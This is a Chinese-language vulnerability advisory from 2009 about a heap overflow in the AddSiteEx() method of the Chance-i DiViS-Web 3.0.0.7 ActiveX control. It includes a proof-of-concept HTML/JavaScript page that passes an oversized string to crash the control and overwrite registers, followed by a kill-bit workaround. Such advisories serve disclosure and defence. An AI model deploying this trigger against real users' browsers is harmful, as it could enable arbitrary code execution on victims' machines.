DiViS-Web ActiveX控件AddSiteEx()方式堆溢出漏洞
发布日期:2009-04-10
更新日期:2009-04-13
受影响系统:Chance-i DiViS-Web 3.0.0.7
描述:
BUGTRAQ ID:
34468
DiViS-Web是Chance-i视频监控系统所使用的基于WEB的控制软件。
DiViS-Web ActiveX控件(ActiveView.cab)没有正确地验证对AddSiteEx()函数所传送的输入参数,如果用户受骗访问了恶意网页并向该参数传送了超长参数的话,就可以触发堆溢出,导致执行任意代码。
<*来源:Digital Security Research Group
链接:
http://marc.info/?l=bugtraq&m=123938565524911&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<OBJECT ID="DVR" classid="clsid:66F7F252-3FE1-4650-B1E5-94B2A38271C5" STYLE="width: 0px;"> <PARAM NAME="_Version" VALUE="65536">
<PARAM NAME="_ExtentX" VALUE="18203">
<PARAM NAME="_ExtentY" VALUE="13705">
<PARAM NAME="_StockProps" VALUE="0">
<PARAM NAME="Split" VALUE="4">
</OBJECT>
//server address
var g_sAddress = location.hostname;
var g_sId = "";
var g_sPwd = "";
var g_bLogin = false;
var g_nMaxCamera = 16;
// Port setting
var g_nImage = 3000;
var g_nControl = 3001;
var g_nSound = 8800;
var long_buff = "alexsint";
while(long_buff.length<(550*8)) long_buff = long_buff + "alexsint"; //rewrite registers
DVR.Channels = 1;
DVR.AddSiteEx("", "", long_buff, "", 0, g_nImage, g_nControl, g_nSound); //Crash on Free() at ntdll
建议:
临时解决方法:
* 为clsid 66F7F252-3FE1-4650-B1E5-94B2A38271C5设置kill-bit。
厂商补丁:
Chance-i
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www[.]divisdvr[.]com/divis/浏览次数:2477
严重程度:0(网友投票)
